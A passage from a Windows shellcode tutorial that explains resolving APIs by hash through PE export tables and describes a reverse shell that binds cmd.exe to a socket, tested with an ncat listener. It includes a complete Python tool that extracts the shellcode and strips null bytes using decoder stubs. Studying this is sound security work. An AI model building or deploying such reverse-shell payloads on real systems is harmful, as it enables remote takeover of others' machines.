As you can see, I'm debugging `calc.exe` in `WinDbg`! That's right: the first module is the executable itself. Note that the pointer `0x683080` used above was read from `InLoadOrderModuleList`, whose links sit at offset 0 of the entry, so subtracting 8 leaves the dump shifted by 8 bytes: the base address `0x60000` shows up under `SizeOfImage` instead of `DllBase`, and the full path under `BaseDllName` instead of `FullDllName`. Starting from `InMemoryOrderModuleList.Flink` (`0x683088`) gives the correct entry address `0x683080`. The important field is `DllBase`. Given the base address of a module, we can analyze the `PE` file loaded in memory and get all kinds of information, such as the addresses of the exported functions. That is exactly what we do in `getProcAddrByHash`:

```
    BYTE *baseAddress = (BYTE *)dte->DllBase;
    if (!baseAddress)           // invalid module(???)
        continue;
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
    IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
    DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!iedRVA)                // Export Directory not present
        continue;
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
    char *moduleName = (char *)(baseAddress + ied->Name);
    DWORD moduleHash = getHash(moduleName);

    // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
    // element of both arrays refer to the same function. The first array specifies the name whereas
    // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
    // AddressOfFunctions to find the entry point of the function.
    DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
    for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
        char *functionName = (char *)(baseAddress + nameRVAs[i]);
        if (hash == moduleHash + getHash(functionName)) {
            WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
            DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
            return baseAddress + functionRVA;
        }
    }
    .
    .
    .
```

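To understand this piece of code you need to look at the PE file format specification; I won't go into much detail here. An important point is that many addresses in the PE file structures are RVAs (`Relative Virtual Addresses`), i.e. addresses relative to the base address of the PE module (`DllBase`). For example, if the `RVA` is `100h` and `DllBase` is `400000h`, then the `RVA` points to data at address `400000h + 100h = 400100h`. The module starts with a `DOS_HEADER`, which contains an `RVA` (`e_lfanew`) to the `NT_HEADERS`. The `NT_HEADERS` contain the `FILE_HEADER` and the `OPTIONAL_HEADER`. The `OPTIONAL_HEADER` contains an array called `DataDirectory`, which points to the various directories of the `PE` module. We are interested in the `Export Directory`; see [https://msdn.microsoft.com/en-us/library/ms809762.aspx](https://msdn.microsoft.com/en-us/library/ms809762.aspx) for the details.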
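The first hop of that chain, from the DOS header to the NT headers, can be tried on a synthetic buffer. The sketch below is an illustration only: the image is a hand-made 256-byte array with just the `MZ` magic, the `e_lfanew` field (at offset `3Ch` of the DOS header) and the `PE\0\0` signature filled in, and the helper name `nt_headers_offset` is made up.

```python
import struct


def nt_headers_offset(image: bytes) -> int:
    """Return e_lfanew, the RVA of the NT headers, after checking both signatures."""
    if image[:2] != b"MZ":
        raise ValueError("DOS signature not found")
    (e_lfanew,) = struct.unpack_from("<i", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("NT signature not found")
    return e_lfanew


# Synthetic image: only the fields used above are filled in.
buf = bytearray(0x100)
buf[0:2] = b"MZ"
struct.pack_into("<i", buf, 0x3C, 0x80)
buf[0x80:0x84] = b"PE\x00\x00"
image = bytes(buf)

base = 0x400000   # hypothetical DllBase
print(hex(base + nt_headers_offset(image)))
```

In the shellcode the same step is the expression `baseAddress + dosHeader->e_lfanew`; the remaining hops (optional header, data directory, export directory) follow the same base-plus-RVA pattern.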

The C structure associated with the `Export Directory` is defined as follows:

```
typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
```
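How the three arrays of the export directory work together is easier to see on a toy example. The sketch below uses plain Python lists in place of the arrays reached through `AddressOfNames`, `AddressOfNameOrdinals` and `AddressOfFunctions`; the export names and RVAs are invented, and `resolve_export` is a hypothetical helper that matches by name rather than by hash.

```python
def resolve_export(names, name_ordinals, functions, wanted):
    """names[i] and name_ordinals[i] describe the same export;
    the ordinal is then used as an index into functions."""
    for i, name in enumerate(names):
        if name == wanted:
            return functions[name_ordinals[i]]
    return None   # export not found


# Invented export tables for illustration.
names = ["Alpha", "Beta", "Gamma"]       # parallel to name_ordinals
name_ordinals = [2, 0, 1]                # indices into functions
functions = [0x1000, 0x2000, 0x3000]     # function RVAs

print(hex(resolve_export(names, name_ordinals, functions, "Alpha")))
```

The name index and the function index are different in general, which is why the lookup cannot simply use `functions[i]`.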

#### DefineFuncPtr

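`DefineFuncPtr` is a handy macro that defines a pointer to an imported function. Here is an example:

```
#define HASH_WSAStartup 0x2ddcd540

#define DefineFuncPtr(name) decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

DefineFuncPtr(WSAStartup);
```

`WSAStartup` is a function imported from `ws2_32.dll`, so `HASH_WSAStartup` is computed like this:

```
DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");
```

When the macro is expanded,

```
DefineFuncPtr(WSAStartup);
```

becomes

```
decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)
```

where `decltype(WSAStartup)` is the type of the function `WSAStartup`. This way we don't need to redefine the function prototype. Note that `decltype` was introduced in `C++11`.

Now we can call `WSAStartup` through `My_WSAStartup`.

Note that before importing a function from a module, we need to make sure that the module is already loaded in memory.

The easiest way is to load the module with `LoadLibrary`:

```
DefineFuncPtr(LoadLibraryA);
My_LoadLibraryA("ws2_32.dll");
```

This works because `LoadLibrary` is imported from `kernel32.dll`, which is always present in memory.

We could also import `GetProcAddress` and use it to get the addresses of all the other functions we need, but that would be wasteful, because we would have to include the names of all those functions in the `shellcode`.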

#### entryPoint

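`entryPoint` is obviously the entry point of the `shellcode` and implements the reverse `shell`. First we import all the functions we need, and then we use them. The details are not important, and I must say that the `winsock API` is very cumbersome to use.

In a nutshell:

1. we create a socket,

2. connect the socket to `127.0.0.1:123`,

3. create a process that executes `cmd.exe`,

4. attach the socket to the standard input, output and error of the process,

5. wait for the process to terminate,

6. when the process has terminated, we terminate the current thread.

Points 3 and 4 are carried out at the same time by a single call to `CreateProcess`. Thanks to point 4, the attacker can listen on port 123 and, once the connection is established, interact with the `cmd.exe` running on the remote machine through the socket, i.e. the `TCP` connection.

To try it out, install `ncat`, run cmd and enter the following on the command line:

```
ncat -lvp 123
```

This starts listening on port 123.

Then go back to `Visual Studio 2013`, select `Release`, build the project and run it. Back in `ncat`, you should see something like this:

```
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>
```

Now you can run any command you like. To exit, type `exit`.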

#### main

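Thanks to the `linker` option

```
Function Order: function_order.txt
```

where the first and only line of `function_order.txt` is `?entryPoint@@YAHXZ`, the function `entryPoint` is placed first in the `shellcode`.

The `linker` appears to follow the order of the functions in the source code, so we could also have placed `entryPoint` before every other function in the source. The `main` function comes last in the source code, so it is linked at the end of the `shellcode`, which lets us tell where the `shellcode` ends. We will see how when we discuss the map file.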

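### 0x02 Python Script

#### Introduction

Now that the executable containing the `shellcode` is ready, we need a way to extract and fix the `shellcode`. This is not easy, so I wrote a `Python` script that:

1. extracts the `shellcode`

2. handles the relocations for the strings

3. fixes the `shellcode` by removing `null` bytes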
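The third step relies on a simple trick: a 32-bit constant that contains `null` bytes can be replaced by two constants without `null` bytes whose XOR gives back the original value. The sketch below follows the same idea as the `get_xor_values` helper in the script, rewritten as a standalone Python 3 example; the value `0x274` is just a sample length.

```python
def dword_to_bytes(value):
    """Little-endian bytes of a 32-bit value, lowest byte first."""
    return [(value >> shift) & 0xFF for shift in (0, 8, 16, 24)]


def bytes_to_dword(data):
    """Inverse of dword_to_bytes."""
    return data[0] | (data[1] << 8) | (data[2] << 16) | (data[3] << 24)


def get_xor_values(value):
    """Find x and y, both free of null bytes, such that x ^ y == value."""
    data = dword_to_bytes(value)
    # A non-null byte that does not occur in value: XORing with it never yields 0.
    key = next(b for b in range(1, 256) if b not in data)
    return [b ^ key for b in data], [key] * 4


x, y = get_xor_values(0x274)   # sample value containing two null bytes
print([hex(b) for b in x], [hex(b) for b in y])
```

At run time a decoder can load the first constant and XOR it with the second to recover the original value, so the encoded bytes themselves never contain a `null`.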

I use `PyCharm` for writing Python.

The script is only 392 lines long, but it is a little tricky, so I will explain it. Here is the code:

“`
# Shellcode extractor by Massimiliano Tomassoli (2015)

import sys
import os
import datetime
import pefile

author = 'Massimiliano Tomassoli'
year = datetime.date.today().year

def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]

def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \
           ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)

def get_cstring(data, offset):
    '''
    Extracts a C string (i.e. null-terminated string) from data starting from offset.
    '''
    pos = data.find('\0', offset)
    if pos == -1:
        return None
    return data[offset:pos+1]

def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]

            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None

    return shellcode_len

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)

        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rva is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str

        return (shellcode, relocs, addr_to_strings)

    except WindowsError:
        print('[!] get_shellcode: Cannot open "%s"' % exe_file)
        return None
    except Exception as e:
        print('[!] get_shellcode: %s' % e.message)
        return None

def dword_to_string(dword):
    return ''.join([chr(x) for x in dword_to_bytes(dword)])

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations

    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...

    delta = 21                                      # shellcode_start - here

    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]

    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)

    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

def dump_shellcode(shellcode):
    '''
    Prints shellcode in C format ('\x12\x23...')
    '''
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ''
        if pos == 0:
            str += '"'
        str += '\\x%02x' % ord(shellcode[i])
        if i == shellcode_len - 1:
            str += '";\n'
        elif pos == bytes_per_row - 1:
            str += '"\n'
        sc_array.append(str)
    shellcode_str = ''.join(sc_array)
    print(shellcode_str)

def get_xor_values(value):
    '''
    Finds x and y such that:
    1) x xor y == value
    2) x and y don't contain null bytes
    Returns x and y as arrays of bytes starting from the lowest significant byte.
    '''

    # Finds a non-null missing byte.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]

    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)

def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''

    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, xor1
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, xor2  (ECX = shellcode length)
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, missing_byte
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]

    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))

def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''

    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))

        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                # The pair goes into bytes_blocks ("bytes" is only the set of
                # values found in the current block).
                bytes_blocks += [missing_bytes[0], num_blocks]
                break

    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   …
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, xor1
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, xor2  (ECX = shellcode length)
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])

    new_shellcode_pieces = []
    pos = 0
    for i in range(len(bytes_blocks) // 2):
        missing_char = chr(bytes_blocks[i*2])
        num_bytes = 254 * bytes_blocks[i*2 + 1]
        new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('\0', missing_char))
        pos += num_bytes

    return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)

def main():
    print("Shellcode Extractor by %s (%d)\n" % (author, year))

    if len(sys.argv) != 3:
        print('Usage:\n' +
              '  %s <exe file> <map file>\n' % os.path.basename(sys.argv[0]))
        return

    exe_file = sys.argv[1]
    map_file = sys.argv[2]

    print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))
    shellcode_len = get_shellcode_len(map_file)
    if shellcode_len is None:
        return
    print('shellcode length: %d' % shellcode_len)

    print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))
    result = get_shellcode_and_relocs(exe_file, shellcode_len)
    if result is None:
        return
    (shellcode, relocs, addr_to_strings) = result

    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')

    if shellcode.find('\0') == -1:
        print('Unbelievable: the shellcode does not need to be fixed!')
        fixed_shellcode = shellcode
    else:
        # shellcode contains null bytes and needs to be fixed.
        print('Fixing the shellcode...')
        fixed_shellcode = get_fixed_shellcode_single_block(shellcode)
        if fixed_shellcode is None:             # if shellcode wasn't fixed...
            fixed_shellcode = get_fixed_shellcode(shellcode)
            if fixed_shellcode is None:
                print('[!] Cannot fix the shellcode')
                return                          # nothing to dump

    print('final shellcode length: %d\n' % len(fixed_shellcode))
    print('char shellcode[] = ')
    dump_shellcode(fixed_shellcode)

main()

“`

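#### The map file and the shellcode length

We tell the linker to produce a map file, which describes the structure of the EXE, with the following options:

* Debugging:
  * Generate Map File: Yes (/MAP)
  * Map File Name: mapfile

The map file is mainly needed to determine the length of the shellcode.

Here is the relevant part of the map file: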

```
shellcode

Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

Preferred load address is 00400000

Start Length Name Class
0001:00000000 00000a9cH .text$mn CODE
0002:00000000 00000094H .idata$5 DATA
0002:00000094 00000004H .CRT$XCA DATA
0002:00000098 00000004H .CRT$XCAA DATA
0002:0000009c 00000004H .CRT$XCZ DATA
0002:000000a0 00000004H .CRT$XIA DATA
0002:000000a4 00000004H .CRT$XIAA DATA
0002:000000a8 00000004H .CRT$XIC DATA
0002:000000ac 00000004H .CRT$XIY DATA
0002:000000b0 00000004H .CRT$XIZ DATA
0002:000000c0 000000a8H .rdata DATA
0002:00000168 00000084H .rdata$debug DATA
0002:000001f0 00000004H .rdata$sxdata DATA
0002:000001f4 00000004H .rtc$IAA DATA
0002:000001f8 00000004H .rtc$IZZ DATA
0002:000001fc 00000004H .rtc$TAA DATA
0002:00000200 00000004H .rtc$TZZ DATA
0002:00000208 0000005cH .xdata$x DATA
0002:00000264 00000000H .edata DATA
0002:00000264 00000028H .idata$2 DATA
0002:0000028c 00000014H .idata$3 DATA
0002:000002a0 00000094H .idata$4 DATA
0002:00000334 0000027eH .idata$6 DATA
0003:00000000 00000020H .data DATA
0003:00000020 00000364H .bss DATA
0004:00000000 00000058H .rsrc$01 DATA
0004:00000060 00000180H .rsrc$02 DATA

Address Publics by Value Rva+Base Lib:Object

0000:00000000 ___guard_fids_table 00000000
0000:00000000 ___guard_fids_count 00000000
0000:00000000 ___guard_flags 00000000
0000:00000001 ___safe_se_handler_count 00000001
0000:00000000 ___ImageBase 00400000
0001:00000000 ?entryPoint@@YAHXZ 00401000 f shellcode.obj
0001:000001a1 ?getHash@@YAKPBD@Z 004011a1 f shellcode.obj
0001:000001be ?getProcAddrByHash@@YAPAXK@Z 004011be f shellcode.obj
0001:00000266 _main 00401266 f shellcode.obj
0001:000004d4 _mainCRTStartup 004014d4 f MSVCRT:crtexe.obj
0001:000004de ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f MSVCRT:unhandld.obj
0001:0000051f ___CxxSetUnhandledExceptionFilter 0040151f f MSVCRT:unhandld.obj
0001:0000052e __XcptFilter 0040152e f MSVCRT:MSVCR120.dll

```

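The first part of the map file tells us that section 1 is the `.text` section, which contains the code:

```
Start Length Name Class
0001:00000000 00000a9cH .text$mn CODE

```

The second part tells us that the `.text` section starts with `?entryPoint@@YAHXZ`, our `entryPoint` function, and that `main` (here called `_main`) is the last of our functions. Since `main` is at offset `0x266` and `entryPoint` is at offset `0`, our shellcode starts at the beginning of the `.text` section and is `0x266` bytes long.

Here is how we do this in Python: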

```
def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]

            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e)
        return None

    return shellcode_len

```
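To make the parsing step concrete, here is a minimal sketch (Python 3) that applies the same split-and-convert logic to the `_main` row of the map file shown earlier. The helper name `parse_map_row` is hypothetical and is not part of the original script.

```python
def parse_map_row(line):
    """Split a 'Publics by Value' row and return (section, offset) as integers.

    The first column has the form 'SSSS:OOOOOOOO', both parts in hex.
    """
    parts = line.split()
    section, offset = parts[0].split(':')
    return int(section, 16), int(offset, 16)

# Row copied from the map file above.
row = "0001:00000266 _main 00401266 f shellcode.obj"
section, offset = parse_map_row(row)

# Since entryPoint sits at offset 0 of section 1, the offset of _main
# is also the length of the shellcode.
print("section %d, shellcode length %d (0x%x)" % (section, offset, offset))
```

The decimal value printed here is the same `614` that the script reports as the shellcode length.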

#### Extracting the shellcode

This part is very easy: we know the length of the shellcode and we know that it is located at the beginning of the `.text` section. Here is the code:

```
def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                # <snip>

        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

```

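I use the module `pefile` ([download](https://code.google.com/p/pefile/)). The relevant part is the body of the `if`.

#### Strings and .rdata

As we said before, C/C++ code may contain strings. For instance, our shellcode contains the following code:

```
My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

```

The string `cmd.exe` is located in the `.rdata` section, a read-only section that contains initialized data. The code refers to the string through its absolute address: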

```
00241152 50 push eax
00241153 8D 44 24 5C lea eax,[esp+5Ch]
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov dword ptr [esp+88h],100h
00241162 50 push eax
00241163 52 push edx
00241164 52 push edx
00241165 52 push edx
00241166 6A 01 push 1
00241168 52 push edx
00241169 52 push edx
0024116A 68 18 21 24 00 push 242118h <------------------------
0024116F 52 push edx
00241170 89 B4 24 C0 00 00 00 mov dword ptr [esp+0C0h],esi
00241177 89 B4 24 BC 00 00 00 mov dword ptr [esp+0BCh],esi
0024117E 89 B4 24 B8 00 00 00 mov dword ptr [esp+0B8h],esi
00241185 FF 54 24 34 call dword ptr [esp+34h]
```

As we can see, the absolute address of `cmd.exe` is `242118h`. Note that the address is part of a `push` instruction and is located at `24116Bh`. If we examine the executable file with a file editor, we see the following:

```
56A: 68 18 21 40 00 push 000402118h
```

where `56Ah` is the offset in the file. The corresponding virtual address (i.e. in memory) is `40116Ah`, given the image base `400000h`. This is the preferred address at which the executable should be loaded in memory. The absolute address in the instruction, `402118h`, is correct if the executable is loaded at the preferred base address. However, if the executable is loaded at a different base address, the instruction needs to be fixed.

How does Windows know which locations of the executable contain addresses that need to be fixed? The PE file contains a Relocation Directory, which in our case points to the `.reloc` section. This directory contains the RVAs of all the locations that need to be fixed.

We can inspect this directory and look for addresses of locations that

1. are contained in the shellcode (i.e. go from `.text:0` to `main` excluded),
2. contain pointers to data in `.rdata`.

For example, the Relocation Directory will contain, among many other addresses, the address `40116Bh`, which locates the last four bytes of the instruction `push 402118h`. These bytes form the address `402118h`, which points to the string `cmd.exe` contained in `.rdata` (which starts at address `402000h`).

Let's look at the function `get_shellcode_and_relocs`. In the first part we extract the `.rdata` section:

```
def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                # <snip>
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)

        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

```

The relevant part is the body of the `elif`.
